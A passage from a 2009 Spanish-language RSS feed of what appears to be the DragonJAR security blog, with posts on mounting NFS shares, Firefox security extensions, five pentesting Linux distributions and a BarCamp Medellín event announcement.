<pre style="padding-left: 30px;">mkdir -p /mnt/{Stuff,Warez}</pre>
<p>Hecho esto procedo a montar las particiones:</p>
<pre style="padding-left: 30px;">mount 192.168.1.86:/media/Stuff /mnt/Stuff
mount 192.168.1.86:/media/Warez /mnt/Warez</pre>
<p><strong>¡Eso es todo!</strong> Ahora podemos acceder al directorio que hayamos asignado en nuestro sistema con los permisos que hayamos establecido <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' title="NFS, Compartiendo archivos en red" /> </p>
<p>A veces resulta bastante engorroso tener que estar ejecutando el anterior comando cada vez que queramos acceder a los datos. Podemos agilizar el proceso agregando una línea al archivo <strong>/etc/fstab</strong>:</p>
<pre style="padding-left: 30px;">192.168.1.86:/media/Stuff /mnt/Stuff nfs defaults,noauto,rsize=32768,wsize=32768 0 0</pre>
<p>De esta manera para acceder a la carpeta en el servidor basta con ejecutar:</p>
<pre style="padding-left: 30px;">mount /mnt/Stuff</pre>
<p>Y listo. Agregué la opción <strong>noauto</strong> para que no se monte automáticamente la <em>partición</em> ya que puede que el equipo servidor no se encuentre encendido ó no accedas muy frecuentemente a ella.</p>
<p>Y como diría <a rel="nofollow" target="_blank" title="Bugs Bunny :)" href="http://thebsreport.files.wordpress.com/2009/06/bugs-bunny-and-carrot.jpg">mi compañero</a>:<strong> ¡Eso es todo amigos¡ </strong> <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="NFS, Compartiendo archivos en red" /> </p>
<p><strong>Enlaces complementarios:</strong></p>
<ul>
<li><a rel="nofollow" target="_blank" href="http://support.microsoft.com/kb/324055/es">Instalar el cliente para NFS en Windows para una migración de UNiX a Windows</a></li>
<li><a rel="nofollow" target="_blank" href="http://revartm.wordpress.com/2007/03/06/servidor-nfs-bajo-ubuntu/">Servidor NFS bajo Ubuntu</a></li>
<li><a rel="nofollow" target="_blank" href="http://fconfig.wordpress.com/2006/08/17/setting-up-a-fedora-nfs-server/">Setting up a Fedora NFS Server</a></li>
<li><a rel="nofollow" target="_blank" href="http://es.gentoo-wiki.com/wiki/NFS">NFS &#8211; Gentoo Linux Wiki</a></li>
<li><a rel="nofollow" target="_blank" href="http://wiki.archlinux.org/index.php/Nfs">NFS &#8211; ArchWiki</a></li>
<li><a rel="nofollow" target="_blank" title="man exports" href="http://linux.die.net/man/5/exports">man exports</a></li>
</ul>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/nuevo-plazo-de-entrega-para-el-reto-forense.xhtml" title="Nuevo Plazo de Entrega para el Reto Forense">Nuevo Plazo de Entrega para el Reto Forense</a></li><li><a href="http://www.dragonjar.org/bug-en-wordpress-251.xhtml" title="Bug en WordPress 2.5.1">Bug en WordPress 2.5.1</a></li><li><a href="http://www.dragonjar.org/google-libera-el-manual-de-seguridad-para-el-navegador.xhtml" title="Google libera el Manual de Seguridad para el Navegador">Google libera el Manual de Seguridad para el Navegador</a></li><li><a href="http://www.dragonjar.org/boletn-de-la-comunidad-dragonjar-0003.xhtml" title="Boletín de La Comunidad DragonJAR #0003">Boletín de La Comunidad DragonJAR #0003</a></li><li><a href="http://www.dragonjar.org/memorias-del-flisol-2008.xhtml" title="Memorias del Flisol 2008">Memorias del Flisol 2008</a></li><li><a href="http://www.dragonjar.org/fotos-y-videos-fotos-de-carolina-cruz.xhtml" title="Fotos y Videos fotos de Carolina Cruz">Fotos y Videos fotos de Carolina Cruz</a></li><li><a href="http://www.dragonjar.org/guarda-las-conversaciones-de-msn-messenger-yahoo-messenger-pidgin-skype-etc.xhtml" title="Guarda las Conversaciones de MSN Messenger, Yahoo! Messenger, Pidgin Skype, etc..">Guarda las Conversaciones de MSN Messenger, Yahoo! Messenger, Pidgin Skype, etc..</a></li><li><a href="http://www.dragonjar.org/abrir-puertos-del-siemens-gigaset-se-461-wimax-de-orbitel-une.xhtml" title="Abrir Puertos del Siemens Gigaset SE 461 WiMax de Orbitel ( UNE )  ">Abrir Puertos del Siemens Gigaset SE 461 WiMax de Orbitel ( UNE )  </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nfs-compartiendo-archivos-en-red.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Las mejores extensiones de Firefox para mejorar tu seguridad</title>
		<link>http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-seguridad.xhtml</link>
		<comments>http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-seguridad.xhtml#comments</comments>
		<pubDate>Sat, 13 Jun 2009 23:57:53 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Extensiones]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[NoScript]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2563</guid>
		<description><![CDATA[
Continuando con la colección de extensiones Firefox imprescindibles para mejorar nuestra navegación, veremos hoy algunas de las mejores enfocadas a la seguridad en la red. Ayer veíamos addons sobre Privacidad, pero como resalté anteriormente la privacidad es sólo uno de los tantos aspectos de los que debemos preocuparnos al utilizar Internet. Lastimósamente, la red está [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Firefox Logo" src="http://img195.imageshack.us/img195/350/firefoxlogo1203368.jpg" alt="firefoxlogo1203368 Las mejores extensiones de Firefox para mejorar tu seguridad" width="248" height="240" /></p>
<p>Continuando con la <a title="Las mejores extensiones de Firefox para mejorar tu privacidad " href="http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-privacidad.xhtml">colección de extensiones Firefox imprescindibles para mejorar nuestra navegación</a>, veremos hoy algunas de las <a title="Las mejores extensiones de Firefox para mejorar tu seguridad " href="http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-seguridad.xhtml">mejores enfocadas a la seguridad en la red</a>. Ayer veíamos addons sobre <strong>Privacidad</strong>, pero como resalté anteriormente la privacidad es sólo uno de los tantos aspectos de los que debemos preocuparnos al utilizar Internet. Lastimósamente, <strong>la red está plagada de Malware</strong> y no sólo tener un buen antivirus y un firewall te mantendrá protegido (aunque si ayudan) ya que en la mayoría de los casos la desinformación del usuario (<strong>capa 8</strong> <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' title="Las mejores extensiones de Firefox para mejorar tu seguridad" /> ) es la responsable de la no filtración del contenido al que accede.</p>
<p>Quizás la herramienta más usada a diario es nuestro <strong>navegador Web</strong> por este motivo es muy importante tener un balance entre usabilidad/seguridad para posiblemente ahorrarnos más de un dolor de cabeza.</p>
<p><span id="more-2563"></span></p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/750">AI Roboform Toolbar for Firefox</a>: </strong>Funciona como barra de herramientas con <strong>RoboForm</strong> para administrar y proteger tus contraseñas.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/938">Dr.Web anti-virus link checker</a>: </strong>Verifica que los archivos no tenga virus antes de descargarlos, lo mismo para los sitios web.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/2366">FirePhish Anti-Phishing Extension</a></strong> / <strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3661">iTrustPage</a></strong> / <strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/2429">Personal Anti-Phishing Sidebar</a></strong> /<a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/2429"> </a><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3840">PhishTank SiteChecker</a>: </strong>Extensiones que te permiten estar alerta sobre el ingreso a un sitio web con contenido falsificado (<strong>Phising</strong>) haciendo uso de bases de datos que contienen URLs identificadas de este tipo.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1579">FormFox</a>: </strong>Al poner el cursos sobre un formulario, te muestra haciendo donde vá la información que estás escribiendo.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3383">KeyScrambler Personal</a>: </strong>Encripta lo que escribes para protegerte de keyloggers.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3199">Link Alert</a>: </strong>Cambia el color de tu cursor para indicar visualmente lo que hace el link que estás apuntando.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/874">Magic Password Generator</a>:</strong> Haciendo uso de una contraseña maestra genera contraseñas únicas para cada sitio. También auto-rellena direcciones de correo electrónico y nombre.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1243"></a></strong></p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/722">NoScript</a>: 100% RECOMENDADA.</strong> Bloquea cualquier código malicioso de páginas que no estén en la lista blanca de sitios en los cuales usted confía. <a title="NoScript" href="http://www.dragonjar.org/noscript.xhtml">Más información sobre NoScript aquí.</a></p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/2848">Password Exporter</a></strong>: Permite importar y exportar tus contraseñas entre diferentes copias de Firefox.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3282">Password Hasher</a></strong>: Genera automáticamente contraseñas fuertes, permite actualizarlas y cambiarlas mucho más rápido.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/469">PasswordMaker</a></strong>: Ayuda a encriptar y almacenar las contraseñas.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1788">PopupMaster</a></strong>: – Agrega un bloqueador de popups a la barra de estado.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/4115">QArchive.org web files checker</a></strong>: – Instálalo y con un simple clic derecho puedes realizar un escaneo de malware, virus, troyanos, etc. antes de descargar.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1237">QuickJava</a></strong>: – Dá la posibilidad de activar/desactivar Java por medio de un botón.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/4429">Secure Login</a></strong>: –  Almacena información de login y llena los formularios con un clic.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/135">SecurePassword Generator</a></strong>: – Generador de contraseñas fuertes.</p>
<p><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/3476"><strong>SignupShield Passwords</strong>:</a> – Administrador de contraseñas (1-Click), rellena formularios, tiene control anti-spam y anti-phising.</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1373">SplitLink</a></strong>: –  Elimina símbolos especiales en las URLs para que puedas saber mejor hacia que</p>
<p><strong><a rel="nofollow" target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/4828">VeriSign EV Green Bar Extension</a></strong>: – Verifica la información de los certificados seguros y pone la barra de direcciones de color verde para hacértelo saber.</p>
<p><strong><a rel="nofollow" target="_blank" title="FireGPG" href="http://getfiregpg.org/index.html">FireGPG</a>:</strong> <a href="http://www.dragonjar.org/?p=2563&amp;cp=1#comment-6657">Sugerida por mi amigo Vierito</a>. Esta extensión provee una interfaz para encriptar, desencriptar, firmar o verificar la firma de algún sitio web usando GnuPG.</p>
<p style="text-align: center;">Y tú,<strong> ¿Que otra extensión usas?</strong></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-privacidad.xhtml" title="Las mejores extensiones de Firefox para mejorar tu privacidad">Las mejores extensiones de Firefox para mejorar tu privacidad</a></li><li><a href="http://www.dragonjar.org/infeccion-virus-a-traves-de-redes-sociales.xhtml" title="Infección Virus a través de Redes Sociales">Infección Virus a través de Redes Sociales</a></li><li><a href="http://www.dragonjar.org/noscript.xhtml" title="NoScript">NoScript</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/top-10-tecnicas-de-seguridad-web-en-el-2009.xhtml" title="Top 10 Técnicas de Seguridad Web en el 2009">Top 10 Técnicas de Seguridad Web en el 2009</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/eisi-iii-dia-3.xhtml" title="Tercer Encuentro Internacional de Seguridad Informática – Día III">Tercer Encuentro Internacional de Seguridad Informática – Día III</a></li><li><a href="http://www.dragonjar.org/damn-vulnerable-web-app.xhtml" title="Damn Vulnerable Web App">Damn Vulnerable Web App</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/las-mejores-extensiones-de-firefox-para-mejorar-tu-seguridad.xhtml/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>5 Distribuciones GNU/Linux para Pentesting</title>
		<link>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml</link>
		<comments>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml#comments</comments>
		<pubDate>Tue, 09 Jun 2009 18:21:32 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Proyectos]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Distribucion]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2494</guid>
		<description><![CDATA[Para nadie es un secreto que a menudo las distribuciones GNU/Linux sean preferidas por los pentesters para llevar acabo auditorías. Y no es que desde otros sistemas operativos no sea posible, sino que generalmente las distros vienen mejor equipadas debido a que se puede, usando una ya creada, personalizarla hasta el punto que nosotros queramos [...]]]></description>
			<content:encoded><![CDATA[<p>Para nadie es un secreto que a menudo las <a title="GNU/Linux DragonJAR" href="http://www.dragonjar.org/category/gnulinux"><strong>distribuciones GNU/Linux</strong></a> sean preferidas por los <a title="Pentest DragonJAR" href="http://www.dragonjar.org/category/pentest"><strong>pentesters</strong></a> para llevar acabo <a title="Auditoría DragonJAR" href="http://www.dragonjar.org/tag/auditoria"><strong>auditorías</strong></a>. Y no es que desde otros<strong> sistemas operativos</strong> no sea posible, sino que generalmente las distros vienen mejor equipadas debido a que se puede, usando una ya creada, personalizarla hasta el punto que nosotros queramos permitiendo añadirle/quitarle las aplicaciones que queramos, modificar la configuración, añadirle módulos y mucho más. Además si le agregamos el hecho de poder <a title=" Los Mejores Live CD’s de Seguridad en un Solo DVD " href="http://www.dragonjar.org/los-mejores-live-cds-de-seguridad-en-un-solo-dvd.xhtml"><strong>ejecutar todo desde un CD</strong> sin necesidad de instalar nada en el disco</a>, la balanza se inclinaría aún más hacia el lado Linux. De cualquier manera, como resalté antes también hay muchísimas herramientas disponibles por ejemplo para <strong>Windows</strong> que facilitan el trabajo a la hora de una auditoría.</p>
<p>En este post vamos a enfocarnos en el repaso de algunas de las <a title="5 Distribuciones GNU/Linux para Pentesting" href="http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml">mejores distribuciones enfocadas a la </a><strong><a title="5 Distribuciones GNU/Linux para Pentesting" href="http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml">Seguridad Informática</a>.</strong></p>
<p><span id="more-2494"></span></p>
<p><strong>1. <a rel="nofollow" target="_blank" title="Backtrack DragonJAR" href="http://www.remote-exploit.org/backtrack.html">BackTrack</a></strong></p>
<p>Sería algo imposible escribir una lista de distribuciones enfocadas a la Seguridad sin hacer mención de Backtrack. Si eres lector asiduo del blog seguramente ya la conoces, <a rel="nofollow" target="_blank" title="4v4t4r" href="http://www.dragonjar.org/author/4v4t4r"><strong>4v4t4r</strong></a> ha realizado muchos <strong>laboratorios</strong> haciendo uso de esta distro. La última versión disponible (a la hora de escribir el artículo) es la <strong>4 BETA</strong>. Con más de 300 herramientas que la convierte en la distribución preferida por los pentesters. Actualmente basada en <strong>Debian/Ubuntu</strong> con unos amplios repositorios que permiten extender aún más su funcionalidad. <a title="Backtrack DragonJAR" href="http://www.dragonjar.org/tag/backtrack">Tanto en este blog</a> como en el de los <a title="Labs DragonJAR Backtrack" href="http://labs.dragonjar.org/category/backtrack">Laboratorios DragonJAR</a> encontrarás <strong>mucha información</strong> sobre el uso de esta distribución.</p>
<p><a rel="nofollow" target="_blank" title="Backtrack Download" href="http://www.remote-exploit.org/backtrack_download.html">Descargar Backtrack</a></p>
<p style="text-align: center;"><img class="alignnone" title="BackTrack 4" src="http://img199.imageshack.us/img199/543/backtrack44302164.png" alt="backtrack44302164 5 Distribuciones GNU/Linux para Pentesting" width="522" height="391" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>2.<a rel="nofollow" target="_blank" title="nUbuntu" href="http://www.nubuntu.org/"> nUbuntu (Network Ubuntu)</a><br />
</strong></p>
<p style="text-align: left;">Como su nombre lo indica basada en <strong>Ubuntu Linux</strong> y usa el escritorio <strong>Fluxbox.</strong> Su objetivo es tener una distribución Linux basada en Ubuntu, personalizada, agregando las herramientas necesarias para realizar pruebas de penetración en servidores y redes; eliminando también aplicaciones que no sean necesarias para este propósito.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="nUbuntu Download" href="http://nubuntu.org/downloads.php">Descargar nUbuntu</a></p>
<p style="text-align: center;"><img class="alignnone" title="nUbuntu" src="http://img268.imageshack.us/img268/8845/2hhdbgz4449305.png" alt="2hhdbgz4449305 5 Distribuciones GNU/Linux para Pentesting" width="522" height="391" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>3. <a rel="nofollow" target="_blank" title="OWASP Live CD Project" href="http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project">OWASP Live CD</a></strong></p>
<p style="text-align: left;">Es una Live-CD que reune algunas de las mejores herramientas open source de seguridad en un sólo lugar. Contiene también documentación y ambientes interactivos de aprendizaje (como <a rel="nofollow" target="_blank" title="WebGoat, Plataforma de Pruebas de Seguridad Web - Instalación y ejecución en Windows" href="http://labs.dragonjar.org/labs-owasp-webgoat-plataforma-de-pruebas-de-seguridad-web-instalacion-en-windows"><strong>WebGoat</strong></a>) promoviendo así la educación en el campo de la <a title="Seguridad Web DragonJAR" href="http://www.dragonjar.org/category/seguridad-web"><strong>Seguridad Web</strong></a>. Para quienes no lo sabía <strong>OWASP</strong> (acrónimo de <em>Open Web Application Security Project</em>) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. <a title="OWASP DragonJAR" href="http://www.dragonjar.org/tag/owasp">En el blog encontrarás mucha información sobre este proyecto</a>.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="OWASP Live CD Download" href="http://mtesauro.com/livecd/index.php?title=Main_Page#Downloads">Descargar OWASP Live CD</a></p>
<p style="text-align: center;"><img class="aligncenter" title="OWASP Live CD" src="http://img194.imageshack.us/img194/5285/socowaspmenu5164977.png" alt="socowaspmenu5164977 5 Distribuciones GNU/Linux para Pentesting" width="539" height="392" /></p>
<p style="text-align: center;">
<p style="text-align: left;"><strong>4. <a rel="nofollow" target="_blank" title="Samurai Web Testing Framework" href="http://samurai.inguardians.com/">Samurai Web Testing Framework</a></strong></p>
<p style="text-align: left;">Distribución Live preconfigurada para el pentesting de <strong>aplicaciones Web</strong>. Incluye muchas herramientas que permiten llevar a cabo fácilmente los 4 pasos básicos en un test de penetración web: <strong>Reconocimiento, Mapeo, Descubrimiento, Explotación.</strong> Además incluye una Wiki que permite almacenar la información recolectada durante el pentesting. <a title="    *           *      Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" href="http://www.dragonjar.org/samurai-entorno-de-trabajo-para-el-testing-de-seguridad-a-aplicativos-web.xhtml">En el blog encuentras más información sobre esta Live-CD</a>.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="Samurai Web Testing Framework Download" href="http://sourceforge.net/project/showfiles.php?group_id=235785">Descargar Samurai Web Testing Framework</a></p>
<p style="text-align: center;"><img class="aligncenter" title="Samurai Web Testing Framework" src="http://img258.imageshack.us/img258/4732/booteoaf7.jpg" alt="booteoaf7 5 Distribuciones GNU/Linux para Pentesting" width="545" height="404" /></p>
<p style="text-align: left;"><strong>5. </strong><a rel="nofollow" target="_blank" title="NST" href="http://www.networksecuritytoolkit.org/nst/index.html"><strong>Network Security Toolkit</strong></a></p>
<p style="text-align: left;">Basada en Fedora, actualmente se encuentra en la versión 1.8.1. Su objetivo es proveer a los administradores de red un completo set de herramientas de seguridad open source. Contiene una gran parte de la lista de las <a rel="nofollow" target="_blank" title="Top 100 Security Tools" href="http://www.insecure.org/tools.html">100 mejores herramientas de seguridad</a> creada por <strong>Insecure</strong>. Lo fascinante es que permite convertir un PC cualquiera en un sistema diseñado para el análisis de tráfico de red, IDS, monitor de redes inalámbricas, entre otros usos. También util en muchos escenarios para la recuperación de daños.</p>
<p style="text-align: left;"><a rel="nofollow" target="_blank" title="Network Security Toolkit Download" href="http://sourceforge.net/project/showfiles.php?group_id=85467">Descargar NST</a></p>
<p style="text-align: center;"><img class="aligncenter" title="NST" src="http://img269.imageshack.us/img269/2928/nst6806785.jpg" alt="nst6806785 5 Distribuciones GNU/Linux para Pentesting" width="500" height="247" /></p>
<p style="text-align: center;">
<p style="text-align: left;">Hay muchas distribuciones Linux enfocadas a las auditorías de seguridad, no las menciono en el post debido a que muchas de ellas ya han sido abandonada por sus desarrolladores y no volvieron a lanzar ninguna actualización ni versiones nuevas. De cualquier manera, si interesa conocer algunas de ellas aquí tienes una lista:</p>
<ul>
<li>Pentoo</li>
<li>Knoppix STD</li>
<li>Notably Auditor</li>
<li>Phlak</li>
</ul>
<p>Por nombrar algunas&#8230; Y tu, <strong>¿Que otra distribución usas para este propósito?</strong></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/varias-distribuciones-live-cd-de-seguridad-en-un-dvd.xhtml" title="Varias Distribuciones Live CD de Seguridad en un DVD">Varias Distribuciones Live CD de Seguridad en un DVD</a></li><li><a href="http://www.dragonjar.org/x-25-conferencia-de-seguridad-informatica-en-mexico.xhtml" title="X.25 Conferencia de Seguridad Informática en Mexico">X.25 Conferencia de Seguridad Informática en Mexico</a></li><li><a href="http://www.dragonjar.org/memoria-usb-booteable-con-varias-distribuciones-de-seguridad-informatica.xhtml" title="Memoria USB Booteable con Varias Distribuciones de Seguridad Informática">Memoria USB Booteable con Varias Distribuciones de Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/pentbox-una-suite-de-seguridad-y-pentesting-en-ruby.xhtml" title="PentBox &#8211; Una suite de seguridad y pentesting en ruby">PentBox &#8211; Una suite de seguridad y pentesting en ruby</a></li><li><a href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a href="http://www.dragonjar.org/dradis-organiza-y-comparte-informacion-en-un-test-de-penetracion.xhtml" title="Dradis, organiza y comparte información en un Test de Penetración">Dradis, organiza y comparte información en un Test de Penetración</a></li><li><a href="http://www.dragonjar.org/como-archivo-etc-hosts.xhtml" title="Bloqueo de sitios Web usando el archivo HOSTS">Bloqueo de sitios Web usando el archivo HOSTS</a></li><li><a href="http://www.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas.xhtml" title="Laboratorios Hacking &#8211; Técnicas y contramedidas">Laboratorios Hacking &#8211; Técnicas y contramedidas</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/5-distribuciones-gnulinux-para-pentesting.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>BarCamp Medellín</title>
		<link>http://www.dragonjar.org/barcamp-medellin.xhtml</link>
		<comments>http://www.dragonjar.org/barcamp-medellin.xhtml#comments</comments>
		<pubDate>Wed, 03 Jun 2009 13:46:59 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[Eventos Informaticos]]></category>
		<category><![CDATA[Eventos en seguridad]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[BarCamp]]></category>
		<category><![CDATA[Desarrollo]]></category>
		<category><![CDATA[Diseño]]></category>
		<category><![CDATA[Medellin]]></category>
		<category><![CDATA[Seguridad Informática]]></category>
		<category><![CDATA[Software Libre]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2450</guid>
		<description><![CDATA[
El próximo Sábado, 6 de Junio se desarrollará en la ciudad de Medellín el BarCamp, un evento que reune entusiatas cibernautas para hablar por medio de des-conferencias sobre temas relacionados con Internet; se discutirá sobre Desarrollo/Diseño Web, Software Libre, E-Marketing, Redes sociales, Seguridad Informática, y un largo etcétera.
Como siempre la Comunidad DragonJAR estará presente en [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Logo BarCamp Medellín" src="http://img370.imageshack.us/img370/3743/logobarcamp2251303.png" alt="logobarcamp2251303 BarCamp Medellín" width="506" height="164" /></p>
<p style="text-align: left;">El próximo <strong>Sábado, 6 de Junio</strong> se desarrollará en la ciudad de <a rel="nofollow" target="_blank" title="BarCamp Medellín" href="http://www.barcampmedellin.com/blog/"><strong>Medellín</strong> el <strong>BarCamp</strong></a>, un evento que reune entusiatas cibernautas para hablar por medio de <em>des-conferencias</em> sobre temas relacionados con Internet; se discutirá sobre Desarrollo/Diseño Web, <a title="Software Libre DragonJAR" href="http://www.dragonjar.org/tag/software-libre"><strong>Software Libre</strong></a>, E-Marketing, Redes sociales, <a title="Seguridad Informática, Hacking" href="http://www.dragonjar.org/"><strong>Seguridad Informática</strong></a>, y un largo etcétera.</p>
<p style="text-align: left;">Como siempre la <strong>Comunidad DragonJAR</strong> estará presente en el evento, tanto en la parte logística como en el área de las des-conferencias.</p>
<p style="text-align: left;"><span id="more-2450"></span>En la parte logística del evento me encontraré yo <strong>(<a title="Filtrar sitios Webs usando OpenDNS desde Linux (Video) " href="http://www.dragonjar.org/filtrar-sitios-webs-usando-opendns-desde-linux-video.xhtml">Cortex</a>)</strong> orientando a los asistentes y colaborando con la realización del mismo. Por el lado de las des-conferencias, habrán 3:</p>
<ul>
<li>Phishing, ¿Qué es?,    ¿Cómo Protegerse? y Casos con Bancos Colombianos &#8211; Por <strong>DragoN</strong></li>
<li> Amenazas y Protección    de Datos en las Nuevas Tecnologías &#8211; Por <strong>4v4t4r</strong></li>
<li> !Seguridad en Joomla¡    ¿Mito o Realidad? &#8211; Por <strong>Bi0virus</strong></li>
</ul>
<p>Habrán muchísimas más des-conferencias, menciono algunas:</p>
<ul>
<li> Streaming Libre, Streaming para todos</li>
<li>Bases para iniciar un    negocio por internet</li>
<li>OpenOffice.org    3.1: Entrenamiento en Linea y Tiempo Real</li>
<li>Saquémosle plata al    grande (Google)</li>
<li> 70 tecnologias de    actualidad</li>
<li>Mírame mamá, estoy    triunfando! (en Internet)</li>
<li>Plataformas    E-learning: Nuevo paradigma en la esfera educativa</li>
<li><strong><a title="GNU/Linux DragonJAR" href="http://www.dragonjar.org/category/gnulinux">Linux</a> en la    Educación: &#8220;Socialmente Justo&#8221; &#8220;Tecnológicamente Justo&#8221;    &#8220;Económicamente Viable&#8221; <img src='http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' title="BarCamp Medellín" /> </strong></li>
<li>El Diserrollador: la    nueva especie de trabajador web</li>
<li><strong>Muchas más!</strong></li>
</ul>
<p>El evento vá dirigido a todo tipo de personas, desde Expertos hasta el público general que sólo le gustaría conocer más sobre las tecnologías que se cuecen en la red.</p>
<p>Un evento de una gran magnitud, en el que todos nos congregaremos para hacer culto a la red. Sobra decir que la entrada es <strong>completamente gratuita</strong> y que todo el que quiera asistir, puede hacerlo libremente. Las des-conferencias se realizarán entre las 9:00am y 5:00pm en el <a rel="nofollow" target="_blank" title="Parque Explora" href="http://www.parqueexplora.org/index3.cfm"><strong>Parque Explora</strong></a>.</p>
<p style="text-align: center;"><strong>¡Invitamos a todos nuestros visitantes a que se hagan presentes y podamos compartir un rato agradable hablando de tecnología!</strong></p>
<p style="text-align: left;"><strong>Enlaces<br />
</strong></p>
<ul>
<li><a rel="nofollow" target="_blank" title="BarCamp Medellín" href="http://www.barcampmedellin.com/">BarCamp Medellín 2009</a></li>
<li><a rel="nofollow" target="_blank" title="Programación BarCamp Medellín 2009" href="http://www.barcampmedellin.com/blog/?page_id=7">Programación de las Des-conferencias</a></li>
</ul>
